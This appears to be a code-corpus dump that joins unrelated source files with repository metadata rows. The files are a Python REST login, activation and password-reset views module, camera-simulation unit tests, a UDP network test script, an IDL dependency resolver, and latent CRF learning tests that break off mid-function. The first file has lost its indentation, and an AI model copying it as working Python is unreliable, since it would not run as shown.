sheet_map[to_dotted_name(isheet)] = {'fields': fields,
'super_types': super_types}
return sheet_map
def _describe_workflows(self, appstructs: dict) -> dict:
cstructs = {}
for name, appstruct in appstructs.items():
schema = create_workflow_meta_schema(appstruct)
cstructs[name] = schema.serialize(appstruct)
return cstructs
@view_config(request_method='GET')
def get(self) -> dict:
"""Get the API specification of this installation as JSON."""
# Collect info about all resources
resources_meta = self.request.registry.content.resources_meta
resource_map = self._describe_resources(resources_meta)
# Collect info about all sheets referenced by any of the resources
sheet_metadata = self.request.registry.content.sheets_meta
sheet_map = self._describe_sheets(sheet_metadata)
workflows_meta = self.request.registry.content.workflows_meta
workflows_map = self._describe_workflows(workflows_meta)
struct = {'resources': resource_map,
'sheets': sheet_map,
'workflows': workflows_map,
}
return struct
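        # Rough shape of the returned structure (keys abbreviated for illustration;
        # the concrete names depend on the registered content types):
        #   {'resources': {'<iresource dotted name>': {'sheets': [...],
        #                                              'super_types': [...]}},
        #    'sheets': {'<isheet dotted name>': {'fields': [{'name': ..., 'valuetype': ...}],
        #                                        'super_types': [...]}},
        #    'workflows': {'<workflow name>': {...}}}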
def _get_base_ifaces(iface: IInterface, root_iface=Interface) -> [str]:
bases = []
current_bases = iface.getBases()
while current_bases:
old_bases = deepcopy(current_bases)
current_bases = ()
for base in old_bases:
if base.extends(root_iface):
bases.append(base.__identifier__)
current_bases += base.getBases()
return bases
def _add_no_such_user_or_wrong_password_error(request: Request):
error = error_entry('body', 'password',
'User doesn\'t exist or password is wrong')
request.errors.append(error)
def validate_login_name(context, request: Request):
"""Validate the user name of a login request.
If valid and activated, the user object is added as 'user' to
`request.validated`.
"""
name = request.validated['name']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
user = locator.get_user_by_login(name)
if user is None:
_add_no_such_user_or_wrong_password_error(request)
else:
request.validated['user'] = user
def validate_login_email(context, request: Request):
"""Validate the email address of a login request.
If valid, the user object is added as 'user' to
`request.validated`.
"""
email = request.validated['email']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
normalized_email = email.lower()
user = locator.get_user_by_email(normalized_email)
if user is None:
_add_no_such_user_or_wrong_password_error(request)
else:
request.validated['user'] = user
def validate_login_password(context, request: Request):
"""Validate the password of a login request.
Requires the user object as `user` in `request.validated`.
"""
user = request.validated.get('user', None)
if user is None:
return
password_sheet = get_sheet(user, IPasswordAuthentication,
registry=request.registry)
password = request.validated['password']
try:
valid = password_sheet.check_plaintext_password(password)
except ValueError:
valid = False
if not valid:
_add_no_such_user_or_wrong_password_error(request)
def validate_account_active(context, request: Request):
"""Ensure that the user account is already active.
Requires the user object as `user` in `request.validated`.
No error message is added if there were earlier errors, as that would
leak information (indicating that a not-yet-activated account already
exists).
"""
user = request.validated.get('user', None)
if user is None or request.errors:
return
if not user.active:
error = error_entry('body', 'name', 'User account not yet activated')
request.errors.append(error)
@view_defaults(
renderer='json',
context=IRootPool,
name='login_username',
)
class LoginUsernameView(RESTView):
"""Log in a user via their name."""
validation_POST = (POSTLoginUsernameRequestSchema,
[validate_login_name,
validate_login_password,
validate_account_active])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
return _login_user(self.request)
def _login_user(request: Request) -> dict:
"""Log-in a user and return a response indicating success."""
user = request.validated['user']
userid = resource_path(user)
headers = remember(request, userid) or {}
user_path = headers['X-User-Path']
user_token = headers['X-User-Token']
return {'status': 'success',
'user_path': user_path,
'user_token': user_token}
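# Hypothetical round trip for the login views in this module (values invented):
#   POST /login_username with {"name": "anna", "password": "secret"}
# returns something like
#   {"status": "success", "user_path": "<user resource path>",
#    "user_token": "<session token>"}
# and the client authenticates later requests with the X-User-Path and
# X-User-Token headers checked in validate_user_headers above.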
@view_defaults(
renderer='json',
context=IRootPool,
name='login_email',
)
class LoginEmailView(RESTView):
"""Log in a user via their email address."""
validation_POST = (POSTLoginEmailRequestSchema,
[validate_login_email,
validate_login_password,
validate_account_active])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
return _login_user(self.request)
def validate_activation_path(context, request: Request):
"""Validate the user name of a login request.
If valid and activated, the user object is added as 'user' to
`request.validated`.
"""
path = request.validated['path']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
user = locator.get_user_by_activation_path(path)
error = error_entry('body', 'path', 'Unknown or expired activation path')
if user is None:
request.errors.append(error)
elif is_older_than(user, days=8):
request.errors.append(error)
user.activation_path = None
else:
user.activate()
user.activation_path = None
request.validated['user'] = user
event = ResourceSheetModified(user, IUserBasic, request.registry, {},
{}, request)
request.registry.notify(event) # trigger reindex activation_path index
@view_defaults(
renderer='json',
context=IRootPool,
name='activate_account',
)
class ActivateAccountView(RESTView):
"""Log in a user via their name."""
validation_POST = (POSTActivateAccountViewRequestSchema,
[validate_activation_path])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Activate a user account and log the user in."""
return _login_user(self.request)
@view_defaults(
renderer='string',
context=IRootPool,
name='report_abuse',
)
class ReportAbuseView(RESTView):
"""Receive and process an abuse complaint."""
validation_POST = (POSTReportAbuseViewRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return super().options()
@view_config(request_method='POST',
accept='application/json')
def post(self) -> dict:
"""Receive and process an abuse complaint."""
messenger = self.request.registry.messenger
messenger.send_abuse_complaint(url=self.request.validated['url'],
remark=self.request.validated['remark'],
user=get_user(self.request))
return ''
@view_defaults(
renderer='json',
context=IRootPool,
name='message_user',
)
class MessageUserView(RESTView):
"""Send a message to another user."""
validation_POST = (POSTMessageUserViewRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
result = {}
if self.request.has_permission('message_to_user', self.context):
schema = POSTMessageUserViewRequestSchema().bind(
context=self.context)
result['POST'] = {'request_body': schema.serialize({}),
'response_body': ''}
return result
@view_config(request_method='POST',
permission='message_to_user',
accept='application/json')
def post(self) -> dict:
"""Send a message to another user."""
messenger = self.request.registry.messenger
data = self.request.validated
messenger.send_message_to_user(recipient=data['recipient'],
title=data['title'],
text=data['text'],
from_user=get_user(self.request))
return ''
@view_defaults(
renderer='json',
context=IRootPool,
name='create_password_reset',
)
class CreatePasswordResetView(RESTView):
"""Create a password reset resource."""
validation_POST = (POSTCreatePasswordResetRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return {'POST': {}}
@view_config(request_method='POST',
accept='application/json'
)
def post(self) -> dict:
"""Create as password reset resource."""
resets = find_service(self.context, 'principals', 'resets')
user = self.request.validated['user']
self.request.registry.content.create(IPasswordReset.__identifier__,
resets,
creator=user)
return {'status': 'success'}
@view_defaults(
renderer='json',
context=IRootPool,
name='password_reset',
)
class PasswordResetView(RESTView):
"""Reset a user password."""
validation_POST = (POSTPasswordResetRequestSchema, [])
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Return options for view."""
return {'POST': {}}
@view_config(request_method='POST',
accept='application/json',
)
def post(self) -> dict:
"""Reset password."""
reset = self.request.validated['path']
password = self.request.validated['password']
reset.reset_password(password)
return _login_user(self.request)
def includeme(config):
"""Register Views."""
config.scan('.views')
| agpl-3.0 | -7,723,900,045,183,047,000 | 36.055777 | 79 | 0.607053 | false |
EMVA1288/emva1288 | emva1288/unittests/test_camera.py | 1 | 7638 | import unittest
from emva1288.camera.camera import Camera
import numpy as np
from emva1288.camera import routines
class CameraTestCase(unittest.TestCase):
def setUp(self):
self.cam = Camera()
def tearDown(self):
del self.cam
def test_img(self):
img = self.cam.grab(0)
self.assertEqual((self.cam.height, self.cam.width), np.shape(img))
def test_radiance(self):
img1 = self.cam.grab(0)
img2 = self.cam.grab(self.cam.get_radiance_for(mean=250))
self.assertLess(img1.mean(), img2.mean())
class CameraTestBayer(unittest.TestCase):
def test_bayer_layer(self):
# Init the parameters
h, w = [480, 640]
wavelength = np.linspace(400, 800, 100)
transmission_red = 670
transmission_blue = 450
transmission_green = 550
b_layer = routines.get_bayer_filter(transmission_green,
transmission_red,
transmission_blue,
transmission_green,
w, h, wavelength)
qe = routines.Qe(filter=b_layer)
cam = Camera(width=w, height=h, qe=qe)
        # Instantiate a cam without a Bayer filter
cam_d = Camera(width=w, height=h)
# Set the camera for testing the layer
target = cam.img_max / 2
        # Get the radiance to grab from the second cam. The output radiance
        # is affected by the QE, and therefore by the Bayer filter as well.
radiance = cam_d.get_radiance_for(mean=target)
img = cam.grab(radiance)
green_filter = np.tile([[0, 1], [1, 0]], (int(h/2), int(w/2)))
blue_filter = np.tile([[1, 0], [1, 1]], (int(h/2), int(w/2)))
red_filter = np.tile([[1, 1], [0, 1]], (int(h/2), int(w/2)))
gf = b_layer[0, 0, :].mean()
rf = b_layer[0, 1, :].mean()
bf = b_layer[1, 0, :].mean()
        # Test that the green channel mean is target * gf, within the delta
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=green_filter).mean(),
target * gf, delta=10,
msg="green not in range")
        # Test that the red channel mean is target * rf, within the delta
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=red_filter).mean(),
target * rf, delta=10,
msg="red not in range")
# Test if the mean of the blue it's 2% of the target +/- 5
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=blue_filter).mean(),
target * bf, delta=10,
msg="blue not in range")
class CameraTestPrnuDsnu(unittest.TestCase):
def test_prnu(self):
# Init the parameters
h, w = [480, 640]
rep = 200
value8 = 3
# create the pattern of the prnu
prnu_array = np.ones((8))
prnu_array[-1] = value8
prnu = routines.get_tile(prnu_array, h, w)
# Set the camera for testing the prnu
cam = Camera(width=w, height=h, prnu=prnu)
var = np.sqrt(cam._sigma2_dark_0)
target = cam.img_max / 2
        # The expected value (top_target) is the target (what we expect without
        # PRNU) multiplied by value8 (the PRNU factor). This works because, as the
        # _u_e function in emva1288.camera.camera shows, the PRNU scales the QE
        # multiplicatively, so multiplying the target by the PRNU gives the same
        # result. Since that product can exceed the maximal value of a pixel, the
        # min() call caps it at the largest value the camera can produce.
top_target = min(target * value8, cam.img_max)
radiance = cam.get_radiance_for(mean=target)
img = cam.grab(radiance)
# create the mask
prnu_mask = np.zeros((8))
prnu_mask[-1] = 1
prnu_mask_resize = routines.get_tile(prnu_mask, h, w)
prnu_non_mask = np.ones((8))
prnu_non_mask[-1] = 0
prnu_non_mask_resize = routines.get_tile(prnu_non_mask, h, w)
        # Test that the mean of the unaffected pixels is the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=prnu_mask_resize).mean(),
target, delta=var,
msg="values are not in range")
        # Test that the mean of the 8th tile value is value8 times the target
        # (capped at img_max), +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=prnu_non_mask_resize).mean(),
top_target, delta=var,
msg="8th value it's not in range")
def test_dsnu(self):
# Init the parameters
h, w = [480, 640]
value8 = 5
rep = 200
# create the pattern of the dsnu
dsnu_array = np.ones((8))
dsnu_array[-1] = value8
dsnu = routines.get_tile(dsnu_array, h, w)
# Set the camera for testing the dsnu
cam = Camera(width=w, height=h, dsnu=dsnu)
var = np.sqrt(cam._sigma2_dark_0)
        # The target is the number of electrons that are not affected by the
        # DSNU. In short, what we expect to observe is a combination of electrons
        # from the dark signal and from the temperature, and that total has to be
        # multiplied by the gain of the system (K).
        # For more explanation see the grab function in emva1288.camera.camera.
target = cam.K * (cam._dark_signal_0 + cam._u_therm())
        # Here the expected value (top_target) is the part that is affected by
        # the DSNU. Physically the same phenomenon happens, but this time the
        # dark signal is non-uniform, so the value that represents the DSNU is
        # added to the dark signal before the multiplication by the gain.
top_target = cam.K * (cam._dark_signal_0 + cam._u_therm() + value8)
img = cam.grab(0)
# create the mask
dsnu_mask = np.zeros((8))
dsnu_mask[-1] = 1
dsnu_mask_resize = routines.get_tile(dsnu_mask, h, w)
dsnu_non_mask = np.ones((8))
dsnu_non_mask[-1] = 0
dsnu_non_mask_resize = routines.get_tile(dsnu_non_mask, h, w)
        # Test that the mean of the unaffected pixels is the target +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=dsnu_mask_resize).mean(),
target, delta=var,
msg="values are not in range")
        # Test that the mean of the 8th tile value matches top_target
        # (value8 added to the dark signal, times the gain), +/- variance
self.assertAlmostEqual(np.ma.masked_array(
img,
mask=dsnu_non_mask_resize).mean(),
top_target, delta=var,
msg="8th value it's not in range")
class CameraTestRoutines(unittest.TestCase):
def test_get_tile(self):
# TEST 1D
# Init the parameters
h, w = [1, 24]
dim1 = np.zeros((8))
# Supposed Results
res_array = routines.get_tile(dim1, h, w)
res_dim1 = np.zeros((24))
        # Test that the tile comes out right;
        # shape[0] gives the number of elements in the (width,) result
self.assertEqual(w, res_array.shape[0])
self.assertEqual(res_dim1.tolist(), res_array.tolist())
# TEST 2D
# Init the parameters
h, w = [5, 7]
dim2 = np.zeros((3))
# Supposed Results
res_array = routines.get_tile(dim2, h, w)
res_dim2 = np.zeros((5, 7))
# Test to see if the layer come right
self.assertEqual((h, w), res_array.shape)
self.assertEqual(res_dim2.tolist(), res_array.tolist())
| gpl-3.0 | -3,343,370,386,381,614,600 | 39.2 | 77 | 0.56651 | false |
AndreasAakesson/IncludeOS | test/net/integration/udp/test.py | 1 | 3159 | #! /usr/bin/env python
from __future__ import print_function
from builtins import str
import sys
import os
from vmrunner import vmrunner
import socket
# Get an auto-created VM from the vmrunner
vm = vmrunner.vms[0]
def UDP_test():
print("<Test.py> Performing UDP tests")
HOST, PORT = "10.0.0.55", 4242
sock = socket.socket
# SOCK_DGRAM is the socket type to use for UDP sockets
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# NOTE: This is necessary for the test to exit after the VM has
# been shut down due to a VM timeout
sock.settimeout(20)
data = "Lucky".encode()
sock.sendto(data, (HOST, PORT))
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "Luke".encode()
sock.sendto(data, (HOST, PORT))
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "x".encode() * 1472
sock.sendto(data, (HOST, PORT))
received = sock.recv(1500)
if received != data:
print("<Test.py> Did not receive long string: {}".format(received))
return False
data = "x".encode() * 9216 # 9216 is apparently default max for MacOS
sock.sendto(data, (HOST, PORT))
received = bytearray()
while (len(received) < len(data)):
received.extend(sock.recv(len(data)))
print("RECEIVED: ", len(received))
if received != data:
print("<Test.py> Did not receive mega string (64k)")
return False
vm.exit(0, "Test completed without errors")
def UDP6_test(trigger_line):
print("<Test.py> Performing UDP6 tests")
HOST, PORT = 'fe80::4242%bridge43', 4242
sock = socket.socket
# SOCK_DGRAM is the socket type to use for UDP sockets
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
res = socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_DGRAM)
af, socktype, proto, canonname, addr = res[0]
# NOTE: This is necessary for the test to exit after the VM has
# been shut down due to a VM timeout
sock.settimeout(20)
data = "Lucky".encode()
sock.sendto(data, addr)
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "Luke".encode()
sock.sendto(data, addr)
received = sock.recv(1024)
print("<Test.py> Sent: {}".format(data))
print("<Test.py> Received: {}".format(received))
if received != data: return False
data = "x".encode() * 1448
sock.sendto(data, addr)
received = sock.recv(1500)
if received != data:
print("<Test.py> Did not receive long string: {}".format(received))
return False
UDP_test()
# Add custom event-handler
vm.on_output("UDP test service", UDP6_test)
if len(sys.argv) > 1:
vm.boot(image_name=str(sys.argv[1]))
else:
# Boot the VM, taking a timeout as parameter
vm.cmake().boot(30,image_name="net_udp").clean()
| apache-2.0 | 3,446,164,124,464,594,400 | 28.801887 | 74 | 0.666667 | false |
kurli/blink-crosswalk | Source/bindings/scripts/interface_dependency_resolver.py | 1 | 15639 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Resolve interface dependencies, producing a merged IdlDefinitions object.
This library computes interface dependencies (partial interfaces and
implements), reads the dependency files, and merges them to the IdlDefinitions
for the main IDL file, producing an IdlDefinitions object representing the
entire interface.
Design doc: http://www.chromium.org/developers/design-documents/idl-compiler#TOC-Dependency-resolution
"""
import os.path
from utilities import idl_filename_to_component, is_valid_component_dependency
# The following extended attributes can be applied to a dependency interface,
# and are then applied to the individual members when merging.
# Note that this moves the extended attribute from the interface to the member,
# which changes the semantics and yields different code than the same extended
# attribute on the main interface.
DEPENDENCY_EXTENDED_ATTRIBUTES = frozenset([
'Conditional',
'PerContextEnabled',
'RuntimeEnabled',
'TypeChecking',
])
class InterfaceDependencyResolver(object):
def __init__(self, interfaces_info, reader):
"""Initialize dependency resolver.
Args:
interfaces_info:
dict of interfaces information, from compute_dependencies.py
reader:
IdlReader, used for reading dependency files
"""
self.interfaces_info = interfaces_info
self.reader = reader
def resolve_dependencies(self, definitions, component):
"""Resolve dependencies, merging them into IDL definitions of main file.
Dependencies consist of 'partial interface' for the same interface as
in the main file, and other interfaces that this interface 'implements'.
These are merged into the main IdlInterface, as the main IdlInterface
implements all these members.
Referenced interfaces are added to IdlDefinitions, but not merged into
the main IdlInterface, as these are only referenced (their members are
introspected, but not implemented in this interface).
Inherited extended attributes are also added to the main IdlInterface.
Modifies definitions in place by adding parsed dependencies.
Args:
definitions: IdlDefinitions object, modified in place
component:
string, describing where the above definitions are defined,
'core' or 'modules'. See KNOWN_COMPONENTS in utilities.py
Returns:
A dictionary whose key is component and value is IdlDefinitions
object whose dependency is resolved.
Raises:
Exception:
A given IdlDefinitions object doesn't have any interfaces,
or a given IdlDefinitions object has incorrect referenced
interfaces.
"""
# FIXME: we need to resolve dependency when we implement partial
# dictionary.
if not definitions.interfaces:
raise Exception('No need to resolve any dependencies of '
'this definition: %s, because this should '
'have a dictionary.' % definitions.idl_name)
target_interface = next(definitions.interfaces.itervalues())
interface_name = target_interface.name
interface_info = self.interfaces_info[interface_name]
if 'inherited_extended_attributes' in interface_info:
target_interface.extended_attributes.update(
interface_info['inherited_extended_attributes'])
resolved_definitions = merge_interface_dependencies(
definitions,
component,
target_interface,
interface_info['dependencies_full_paths'] +
interface_info['dependencies_other_component_full_paths'],
self.reader)
for referenced_interface_name in interface_info['referenced_interfaces']:
referenced_definitions = self.reader.read_idl_definitions(
self.interfaces_info[referenced_interface_name]['full_path'])
for referenced_component in referenced_definitions:
if not is_valid_component_dependency(component, referenced_component):
raise Exception('This definitions: %s is defined in %s '
'but reference interface:%s is defined '
'in %s' % (definitions.idl_name,
component,
referenced_interface_name,
referenced_component))
resolved_definitions[component].update(referenced_definitions[component])
return resolved_definitions
def merge_interface_dependencies(definitions, component, target_interface, dependency_idl_filenames, reader):
"""Merge dependencies ('partial interface' and 'implements') in dependency_idl_filenames into target_interface.
Args:
definitions: IdlDefinitions object, modified in place
component:
string, describing where the above definitions are defined,
'core' or 'modules'. See KNOWN_COMPONENTS in utilities.py
target_interface: IdlInterface object, modified in place
dependency_idl_filenames:
Idl filenames which depend on the above definitions.
reader: IdlReader object.
Returns:
A dictionary whose key is component and value is IdlDefinitions
object whose dependency is resolved.
"""
resolved_definitions = {component: definitions}
# Sort so order consistent, so can compare output from run to run.
for dependency_idl_filename in sorted(dependency_idl_filenames):
dependency_definitions = reader.read_idl_file(dependency_idl_filename)
dependency_component = idl_filename_to_component(dependency_idl_filename)
dependency_interface = next(dependency_definitions.interfaces.itervalues())
dependency_interface_basename, _ = os.path.splitext(os.path.basename(dependency_idl_filename))
transfer_extended_attributes(dependency_interface,
dependency_interface_basename)
# We need to use different checkdeps here for partial interface and
# inheritance.
if dependency_interface.is_partial:
# Case: dependency_interface is a partial interface of
# target_interface.
# So,
# - A partial interface defined in modules can update
# the original interface defined in core.
# However,
# - A partial interface defined in core cannot update
# the original interface defined in modules.
if not is_valid_component_dependency(dependency_component, component):
raise Exception('The partial interface:%s in %s cannot update '
'the original interface:%s in %s' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
if dependency_component in resolved_definitions:
                # When merging a new partial interface, we should not overwrite
                # the ImplementedAs extended attribute in the merged partial
                # interface.
                # See also the comment at the "if 'ImplementedAs' not in ..."
                # line below.
dependency_interface.extended_attributes.pop('ImplementedAs', None)
resolved_definitions[dependency_component].update(dependency_definitions)
continue
dependency_interface.extended_attributes.update(target_interface.extended_attributes)
assert target_interface == definitions.interfaces[dependency_interface.name]
            # A partial interface should use its original interface's
            # ImplementedAs. If the original interface doesn't have one,
            # remove the ImplementedAs defined in the partial interface,
            # because the partial interface needs the original interface's
            # cpp class to obtain the partial interface's cpp class.
            # e.g. V8WindowPartial.cpp:
# DOMWindow* impl = V8Window::toImpl(holder);
# RawPtr<...> cppValue(DOMWindowQuota::webkitStorageInfo(impl));
# TODO(tasak): remove ImplementedAs extended attributes
# from all partial interfaces. Instead, rename all cpp/header
# files correctly. ImplementedAs should not be allowed in
# partial interfaces.
if 'ImplementedAs' not in target_interface.extended_attributes:
dependency_interface.extended_attributes.pop('ImplementedAs', None)
dependency_interface.original_interface = target_interface
target_interface.partial_interfaces.append(dependency_interface)
resolved_definitions[dependency_component] = dependency_definitions
else:
# Case: target_interface implements dependency_interface.
# So,
# - An interface defined in modules can implement some interface
# defined in core.
# In this case, we need "NoInterfaceObject" extended attribute.
# However,
# - An interface defined in core cannot implement any interface
# defined in modules.
if not is_valid_component_dependency(component, dependency_component):
raise Exception('The interface:%s in %s cannot implement '
'the interface:%s in %s.' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
if component != dependency_component and 'NoInterfaceObject' not in dependency_interface.extended_attributes:
raise Exception('The interface:%s in %s cannot implement '
'the interface:%s in %s because of '
'missing NoInterfaceObject.' % (dependency_interface.name,
dependency_component,
target_interface.name,
component))
resolved_definitions[component].update(dependency_definitions) # merges partial interfaces
# Implemented interfaces (non-partial dependencies) are also merged
# into the target interface, so Code Generator can just iterate
# over one list (and not need to handle 'implements' itself).
target_interface.merge(dependency_interface)
return resolved_definitions
def transfer_extended_attributes(dependency_interface, dependency_interface_basename):
"""Transfer extended attributes from dependency interface onto members.
Merging consists of storing certain interface-level data in extended
attributes of the *members* (because there is no separate dependency
interface post-merging).
The data storing consists of:
* applying certain extended attributes from the dependency interface
to its members
* storing the C++ class of the implementation in an internal
extended attribute of each member, [PartialInterfaceImplementedAs]
No return: modifies dependency_interface in place.
"""
merged_extended_attributes = dict(
(key, value)
for key, value in dependency_interface.extended_attributes.iteritems()
if key in DEPENDENCY_EXTENDED_ATTRIBUTES)
# A partial interface's members are implemented as static member functions
# in a separate C++ class. This class name is stored in
# [PartialInterfaceImplementedAs] which defaults to the basename of
# dependency IDL file.
# This class name can be overridden by [ImplementedAs] on the partial
# interface definition.
#
# Note that implemented interfaces do *not* need [ImplementedAs], since
# they are implemented on the C++ object |impl| itself, just like members of
# the main interface definition, so the bindings do not need to know in
# which class implemented interfaces are implemented.
#
# Currently [LegacyTreatAsPartialInterface] can be used to have partial
# interface behavior on implemented interfaces, but this is being removed
# as legacy cruft:
# FIXME: Remove [LegacyTreatAsPartialInterface]
# http://crbug.com/360435
#
# Note that [ImplementedAs] is used with different meanings on interfaces
# and members:
# for Blink class name and function name (or constant name), respectively.
# Thus we do not want to copy this from the interface to the member, but
# instead extract it and handle it separately.
if (dependency_interface.is_partial or
'LegacyTreatAsPartialInterface' in dependency_interface.extended_attributes):
merged_extended_attributes['PartialInterfaceImplementedAs'] = (
dependency_interface.extended_attributes.get(
'ImplementedAs', dependency_interface_basename))
def update_attributes(attributes, extras):
for key, value in extras.items():
if key not in attributes:
attributes[key] = value
for attribute in dependency_interface.attributes:
update_attributes(attribute.extended_attributes, merged_extended_attributes)
for constant in dependency_interface.constants:
update_attributes(constant.extended_attributes, merged_extended_attributes)
for operation in dependency_interface.operations:
update_attributes(operation.extended_attributes, merged_extended_attributes)
| bsd-3-clause | -6,499,466,371,629,865,000 | 49.775974 | 121 | 0.655988 | false |
pystruct/pystruct | pystruct/tests/test_learners/test_latent_node_crf_learning.py | 1 | 7044 | import itertools
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from nose.tools import assert_equal, assert_true
from pystruct.models import GraphCRF, LatentNodeCRF, EdgeFeatureLatentNodeCRF
from pystruct.learners import (NSlackSSVM, LatentSSVM,
SubgradientLatentSSVM, OneSlackSSVM,
SubgradientSSVM)
from pystruct.datasets import generate_blocks, make_simple_2x2
from pystruct.utils import make_grid_edges
def make_edges_2x2():
edges = []
node_indices = np.arange(4 * 4).reshape(4, 4)
for i, (x, y) in enumerate(itertools.product([0, 2], repeat=2)):
for j in range(x, x + 2):
for k in range(y, y + 2):
edges.append([i + 4 * 4, node_indices[j, k]])
return edges
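# Editor's sketch (added for clarity, not part of the original tests): each of the
# 4 hidden nodes created above (indices 16..19) is wired to one 2x2 patch of the
# 4x4 grid, e.g. hidden node 16 connects to grid nodes 0, 1, 4 and 5.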
def test_binary_blocks_cutting_plane_latent_node():
# testing cutting plane ssvm on easy binary dataset
# we use the LatentNodeCRF without latent nodes and check that it does the
# same as GraphCRF
X, Y = generate_blocks(n_samples=3)
crf = GraphCRF()
clf = NSlackSSVM(model=crf, max_iter=20, C=100, check_constraints=True,
break_on_bad=False, n_jobs=1)
x1, x2, x3 = X
y1, y2, y3 = Y
n_states = len(np.unique(Y))
# delete some rows to make it more fun
x1, y1 = x1[:, :-1], y1[:, :-1]
x2, y2 = x2[:-1], y2[:-1]
# generate graphs
X_ = [x1, x2, x3]
G = [make_grid_edges(x) for x in X_]
# reshape / flatten x and y
X_ = [x.reshape(-1, n_states) for x in X_]
Y = [y.ravel() for y in [y1, y2, y3]]
X = list(zip(X_, G))
clf.fit(X, Y)
Y_pred = clf.predict(X)
for y, y_pred in zip(Y, Y_pred):
assert_array_equal(y, y_pred)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=0)
latent_svm = LatentSSVM(NSlackSSVM(model=latent_crf, max_iter=20, C=100,
check_constraints=True,
break_on_bad=False, n_jobs=1),
latent_iter=3)
X_latent = list(zip(X_, G, np.zeros(len(X_), dtype=np.int)))
latent_svm.fit(X_latent, Y, H_init=Y)
Y_pred = latent_svm.predict(X_latent)
for y, y_pred in zip(Y, Y_pred):
assert_array_equal(y, y_pred)
assert_array_almost_equal(latent_svm.w, clf.w)
def test_latent_node_boxes_standard_latent():
# learn the "easy" 2x2 boxes dataset.
# a 2x2 box is placed randomly in a 4x4 grid
# we add a latent variable for each 2x2 patch
# that should make the model fairly simple
X, Y = make_simple_2x2(seed=1, n_samples=40)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
one_slack = OneSlackSSVM(latent_crf)
n_slack = NSlackSSVM(latent_crf)
subgradient = SubgradientSSVM(latent_crf, max_iter=100)
for base_svm in [one_slack, n_slack, subgradient]:
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [2 * 2 for x in X_flat]))
latent_svm.fit(X_[:20], Y_flat[:20])
assert_array_equal(latent_svm.predict(X_[:20]), Y_flat[:20])
assert_equal(latent_svm.score(X_[:20], Y_flat[:20]), 1)
# test that score is not always 1
assert_true(.98 < latent_svm.score(X_[20:], Y_flat[20:]) < 1)
def test_latent_node_boxes_latent_subgradient():
# same as above, now with elementary subgradients
X, Y = make_simple_2x2(seed=1)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
latent_svm = SubgradientLatentSSVM(model=latent_crf, max_iter=50, C=10)
G = [make_grid_edges(x) for x in X]
